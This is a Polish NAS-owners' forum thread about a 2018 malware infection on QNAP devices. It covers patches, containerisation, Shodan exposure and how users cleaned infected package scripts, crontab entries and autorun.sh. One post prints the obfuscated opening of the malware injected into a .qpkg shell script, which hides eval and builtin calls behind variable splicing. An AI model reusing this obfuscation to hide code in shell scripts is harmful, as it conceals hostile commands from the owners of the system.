QNAP sobie dość swietnie radzi z ransomware oferując migawki.
Container Station - Docker lub Wirtualizacja.
Wszystko to oferuje QNAP. To użytkownik decyduje z czego chce korzystać.
Słuchajcie żyjemy w czasach gdzie NSA/CIA ma specjalistów, którzy pisali "pendrive-owe" backdoory omijające Symanteca i inne softy, gdzie Microsoft oznajmił, że NSA wymusiło na nich udostępnienie kodu źródłowego ich systemu, gdzie Malware stał się popularny. Mamy ogromny problem w tych czasach, ale kiedyś przyjdzie rozwiązanie, jak nie ze strony programistów to z naszego rozsądku.
- 6 Luty 2011
- 1 957
- 313
- 133
- 39
- QNAP
- TS-x53A
- Ethernet
- 802.11ac (Wi-Fi 5)
Oczywiście, tego się nie uniknie. Można za to minimalizować ryzyko które aktualnie jest, posiadając jakiekolwiek dodatkowe narzędzie uruchomione i wystawione na świat.
Koledzy,
Nie wiem czy zauważyliście ale MusicStation w aktualizacji 5.1.3 i 5.2.0 (z dnia 09.20) Qnap twiedzi że usunął "security Issue" więc może załatali lukę.
A tutaj się zgadzam w 100%. Oddzielenie od warstwy sprzętu lub systemu macierzystego od warstwy aplikacji jest jednym z najlepszych metod zapobieganiu tego typu atakom. Idąc za przykładem można stawiać np. Open Stack'a (trochę hardcorowo).
Pytanie moje czy Qnap udostępnia kontenery z Music station lub innymi aplikacjami? Gdyby Music Station była konteneryzowana na systemie to nie mieli byśmy dzisiaj problemu z robakiem.
Nie wiem czy zauważyliście ale MusicStation w aktualizacji 5.1.3 i 5.2.0 (z dnia 09.20) Qnap twiedzi że usunął "security Issue" więc może załatali lukę.
A tutaj się zgadzam w 100%. Oddzielenie od warstwy sprzętu lub systemu macierzystego od warstwy aplikacji jest jednym z najlepszych metod zapobieganiu tego typu atakom. Idąc za przykładem można stawiać np. Open Stack'a (trochę hardcorowo).
Pytanie moje czy Qnap udostępnia kontenery z Music station lub innymi aplikacjami? Gdyby Music Station była konteneryzowana na systemie to nie mieli byśmy dzisiaj problemu z robakiem.
U mnie Qnap służy dla kilku osób, które muszą mieć proste i przejrzyste aplikacje - głównie zdjęcia i muzyka. Photo Station daje radę chociaż mam kilka uwag, natomiast z pośród Plex'a i Music Station niestety Plex nie sprostał wymaganiom ogółu - co nie znaczy też że MS jest cudowne.
Dla aplikacji firm trzecich - tak. Ale nie widzę takiego sensu dla natywnych.
Ciekawe czy to prawda że osoby korzystające z mycloud qnapa również były/są podatne na atak.
Link do zagranicznego forum - klikanaście postów wyżej. Taka padła sugestia. Ja mam zewnętrzne Ip ale może ktoś nie i może potwierdzić...
Kolejne bzdury.
Każdy wystawiony na zewnątrz, którego dało się zeskanować.
https://www.shodan.io/search?query=qnap+nas
Lub po IP...
Każdy wystawiony na zewnątrz, którego dało się zeskanować.
https://www.shodan.io/search?query=qnap+nas
Lub po IP...
https://www.shodan.io/host/<tu_podac_swoje_ip> - https://www.shodan.io/host/1.2.3.4Moj NAS 25.08 zostal zainfekowany.
Wirus zaszyfrowal mi pliki sh w nastepujacych katalogach:
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 FileStation_HD
drwxr-xr-x 3 admin administrators 4096 2018-08-25 08:59 JRE/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 MusicStation_HD/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 MyNAS/
drwxr-xr-x 11 admin administrators 4096 2018-08-25 08:59 NotesStation3/
drwxr-xr-x 5 admin administrators 4096 2018-08-25 08:59 PhotoExt/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 PhotoStation_HD/
drwxr-xr-x 7 admin administrators 4096 2018-08-25 08:59 Plex_Home_Theater/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:59 VideoStation_HD/
Masakra.
Wirus zaszyfrowal mi pliki sh w nastepujacych katalogach:
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 FileStation_HD
drwxr-xr-x 3 admin administrators 4096 2018-08-25 08:59 JRE/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 MusicStation_HD/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 MyNAS/
drwxr-xr-x 11 admin administrators 4096 2018-08-25 08:59 NotesStation3/
drwxr-xr-x 5 admin administrators 4096 2018-08-25 08:59 PhotoExt/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:58 PhotoStation_HD/
drwxr-xr-x 7 admin administrators 4096 2018-08-25 08:59 Plex_Home_Theater/
drwxr-xr-x 6 admin administrators 4096 2018-08-25 08:59 VideoStation_HD/
Masakra.
Jak zaszyfrowal? Nie da się ich uruchomić, czy maja podejrzana zawartosc?
Sa zaszyfrowane ale dzialaja.
Masz naglowek pliku /bin/sh a potem same krzaki.
Masz naglowek pliku /bin/sh a potem same krzaki.
Mogę się mylić, ale: to nie plik został zaszyfrowany. Te krzaki to zaszyfrowany payload wirusa, a nie pliku.
Jeśli czujesz się na siłach - usuń uważnie krzaki z plików, i będzie ok.
Dodatkowo usuń podejrzane wpisy z crontab.
I wyczyść autorun.sh
Jeśli czujesz się na siłach - usuń uważnie krzaki z plików, i będzie ok.
Dodatkowo usuń podejrzane wpisy z crontab.
I wyczyść autorun.sh
Pierwszy z brzegu plik:
[/share/CACHEDEV1_DATA/.qpkg/VideoStation_HD] # cat VideoStation_HD.sh
#!/bin/sh
unse${QGxgjGuEBrn}t
bu${bLdOSQeMFsT}i$'\x6c'tin${JmSQHQLEb}
eva${jdovJKnDFUyUq}l
tru$'\x65'${falgDjhkjobGZXp}${UVlcaaptUglG}
${LdKBpBQijOYbVL}t${zlTerQEixpK}e${wPKekGG}st
${pfQtXBMyvA}bu${xWQxMydAbVmeQcT}iltin
${slrnSTjQHugTqB}t$nPtwDiIBFVHTz$''yp${FFKiTAZGK}e
ev$MCWcPCkMSjHGsBI$''al
I tak dalej.
Jak dla mnie QNAP nie bedzie mial laty na to. Na reddicie pisza ze ichni helpdesk kazde flashowac i inicjowac qnapa od nowa. Nasz helpdesk kaze czekac. Co za profesjonalizm i komunikacja wewnatrz firmy....
@cajar autorun.sh odhaczylem aby nie uzywal.
Niestety wpisy z crontaba po usunieciu po restarcie pojawiaja sie ponownie.
[/share/CACHEDEV1_DATA/.qpkg/VideoStation_HD] # cat VideoStation_HD.sh
#!/bin/sh
unse${QGxgjGuEBrn}t
bu${bLdOSQeMFsT}i$'\x6c'tin${JmSQHQLEb}
eva${jdovJKnDFUyUq}l
tru$'\x65'${falgDjhkjobGZXp}${UVlcaaptUglG}
${LdKBpBQijOYbVL}t${zlTerQEixpK}e${wPKekGG}st
${pfQtXBMyvA}bu${xWQxMydAbVmeQcT}iltin
${slrnSTjQHugTqB}t$nPtwDiIBFVHTz$''yp${FFKiTAZGK}e
ev$MCWcPCkMSjHGsBI$''al
I tak dalej.
Jak dla mnie QNAP nie bedzie mial laty na to. Na reddicie pisza ze ichni helpdesk kazde flashowac i inicjowac qnapa od nowa. Nasz helpdesk kaze czekac. Co za profesjonalizm i komunikacja wewnatrz firmy....
@cajar autorun.sh odhaczylem aby nie uzywal.
Niestety wpisy z crontaba po usunieciu po restarcie pojawiaja sie ponownie.
Ja swojego NAS wyczyściłem w ten sposób że przeszukałem cały / w poszukiwaniu tego typu wpisoe, ręcznie to usunąłem i jest OK.
A support QNAP robi co momo w tej kwestii. Odkąd założyłem ostatni ticket w tej sprawie bardzo pozytywnie mnie zaskoczyli
A support QNAP robi co momo w tej kwestii. Odkąd założyłem ostatni ticket w tej sprawie bardzo pozytywnie mnie zaskoczyli
Współpracą i nastawieniem na rozwiązanie problemu. Tam też pracują ludzie, robią co mogą żeby rozwiązać problem.
Wracając do meritum: jeśli wpisu cron pojawiają się ponownie to znaczy że nie wszystkie pliki .sh zostały wyczyszczone.
Wracając do meritum: jeśli wpisu cron pojawiają się ponownie to znaczy że nie wszystkie pliki .sh zostały wyczyszczone.
Skasowalem payloady z tych folderow. Usunalem wpisy z crontaba. Zobaczymy jaki bedzie efekt. Na innych forach pisali ze apache zostal podmieniony
Lipa. Wpis w crontabie wrocil. Nie wiesz gdzie jeszcze te payloady moga byc oprocz autorun.sh, crontaba oraz plikow sh z .qpkg? @cajar
Lipa. Wpis w crontabie wrocil. Nie wiesz gdzie jeszcze te payloady moga byc oprocz autorun.sh, crontaba oraz plikow sh z .qpkg? @cajar
Przeszukaj cały katalog / pod kątem zawartości - tak znajdziesz pozostałe zainfekowane pliki.
I nie wiem czy założyłeś ticket w helpdesku, ale może dostaniesz wersje developerska malwsre removera.
I nie wiem czy założyłeś ticket w helpdesku, ale może dostaniesz wersje developerska malwsre removera.
- 6 Luty 2011
- 1 957
- 313
- 133
- 39
- QNAP
- TS-x53A
- Ethernet
- 802.11ac (Wi-Fi 5)
I to chyba jedyna na ten czas rozwiązanie.
Mam inne odczucia. Ale zgadzam się:
Użytkownicy znaleźli tą stronę używając tych słów:
- aktualizacja przez konsole
- Vu